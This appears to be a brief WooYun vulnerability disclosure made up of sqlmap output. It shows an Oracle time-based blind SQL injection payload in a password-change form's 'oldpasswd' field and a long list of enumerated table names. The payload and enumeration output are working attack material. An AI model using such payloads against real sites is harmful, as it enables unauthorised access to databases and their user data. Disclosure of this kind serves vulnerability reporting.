WooYun.org

跑到的数据：
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: oldpasswd
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query - comment)
Payload: login=GXMa&oldpasswd=MEzU' AND 7739=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--&passwd=MEzU&passwdconfirm=&Submit=%D0%DE%B8%C4%C3%DC%C2%EB&dotype=modify
---
web application technology: Nginx, PHP 5.2.12
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): ''
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: oldpasswd
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query - comment)
Payload: login=GXMa&oldpasswd=MEzU' AND 7739=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--&passwd=MEzU&passwdconfirm=&Submit=%D0%DE%B8%C4%C3%DC%C2%EB&dotype=modify
---
web application technology: Nginx, PHP 5.2.12
back-end DBMS: Oracle
Current database
[164 tables]
+-------------------------------+
| SESSION |
| 4IMAGES_USERS |
| ALL_USERS |
| ASP |
| AFFICHAGE1AFFICHAGE1EDU |
| AIRCRAFT |
| BOOK_LOANS |
| COURSE |
| DEPARTMENT |
| DWE_WF_ATTRIBUTES |
| D_UNIT |
| DATAFEEDSHOWTAG2 |
| DEVICE |
| EQUIPE |
| EVENT_BACKUP |
| EXTERNALIDENTIFIER |
| EXTERNALLINK |
| FUNDGROUP |
| KUNST |
| LINK_TABLE |
| MANAGEMENTGROUP |
| METADATAFIELDREGISTRY |
| MICROSOFT |
| MITGLIEDER |
| MITGLIEDERLISTE |
| PARTS |
| POPULATION |
| PROPERTY |
| REGISTRYPACKAGE |
| SGA_XPLAN_TPL_DBA_INDEXES |
| SGA_XPLAN_TPL_V$SQL_PLAN_STAT |
| SUBSCRIBE |
| SETTINGS |
| STRINGTABLE |
| SUBJECT |
| SURVEY |
| TABLE_PRIVILEGE_MAP |
| TBLLOG |
| TBLREPORTS |
| TBLTRANSACTIONS |
| THOT_SOURCE |
| TITEL |
| ADMIN_PASS |
| ADMINUPASS |
| ARTIKEL |
| AUTH |
| BINN_BANN |
| BORROWER |
| CATALOGUE |
| CDV_MARKER |
| CDV_REASON |
| CMREPOSITORY |
| CMS_ADMIN |
| CONFIGURATORE |
| CONNECTORMACASSOCS |
| CONNEXION |
| CONTACT |
| CONTENT |
| CONTENU |
| CONTROLE |
| CRON_SEND |
| DANGNHAP |
| DATA |
| DBADMIN |
| DERIVED_TYPES |
| DICTIONARY |
| DIV_TREATMENT |
| DTB_CUSTOMER_READING |
| DTB_MAILMAGA_TEMPLATE |
| DTB_SEND_HISTORY |
| EMU_SERVICES |
| ENREGISTRS |
| EXAM |
| EZIN_ARTICLES |
| FIELD |
| FORUM_CAT |
| FORUM_USERS |
| FUNCTIONS |
| FURNITURE |
| FUSION_USERS |
| GENERAL |
| ICQ |
| INFO |
| INSTITUTION |
| IPASSOCS |
| JFORUM_ATTACH |
| JFORUM_FORUMS |
| JOS_JF_CONTENT |
| JOS_VM_CART |
| JOS_VM_ORDER_PAYMENT |
| JOS_WEBLINKS |
| KEYBOARDS |
| LAKE |
| LOCUS_DATA |
| LOSTPASSWORDS |
| M_EARNINGS |
| MENU |
| MESSAGES |
| MTB_PREF |
| MUSHROOM_TESTSET |
| MY_POI |
| MYSQL |
| NEWS |
| NGUOIDUNG |
| NLCONFIG |
| NOTES |
| NUKE_BBTHEMES_NAME |
| NUKE_COMMENTS |
| NUKE_DOWNLOADS_MODREQUEST |
| NUKE_FAQANSWER |
| NUKE_JOURNAL_COMMENTS |
| NUKE_QUEUE |
| NUKE_REVIEWS_ADD |
| NUKE_STATS_HOUR |
| OIL_BFSURVEYPRO_35 |
| OIL_POLLS |
| PAGE_RESTRICTIONS |
| PAROL |
| PAY_MELODIES |
| PERMISSION |
| PHOTO |
| PHPSHOP_BANERS |
| PRODUCTS |
| PRODUITS |
| PWRD |
| QRTZ_FIRED_TRIGGERS |
| QUANTRI |
| REG_USER |
| SECTOR |
| SF_GUARD_USER_GROUP |
| SHARED_SECRET_IDENTITY |
| SIC |
| SING |
| SINGUP |
| SITEINDEXTABLE |
| SITES |
| STATS |
| STORE2 |
| STUDENTS |
| SYSMAPS_HOSTS |
| TAIKHOANQUANTRI |
| TB_ACCOUNT |
| TB_LOGINS |
| TB_USERACCOUNTS |
| TBLNEWS |
| TBL_MEMBER |
| TBL_NGUOIDUNG |
| TBL_USERACCOUNT |
| TBL_USERS |
| TBL_WORKS_CLIENTS |
| TBLBLOGENTRIESRELATED |
| TBLBLOGPAGES |
| TESTS |
| USER_NAMES |
| USER_PASSWD |
| USER_TYPES |
| USER_USRNM |
| USRPASS |
| UTENTE |
| UTILISATEURS |
| VERWALTEN |
| VRLS_XREF_LISTING_OFFER_TYPE |
| VWLISTALLAVAILABLE |
| XOOPS_BANNERCLIENT |
就这样了。。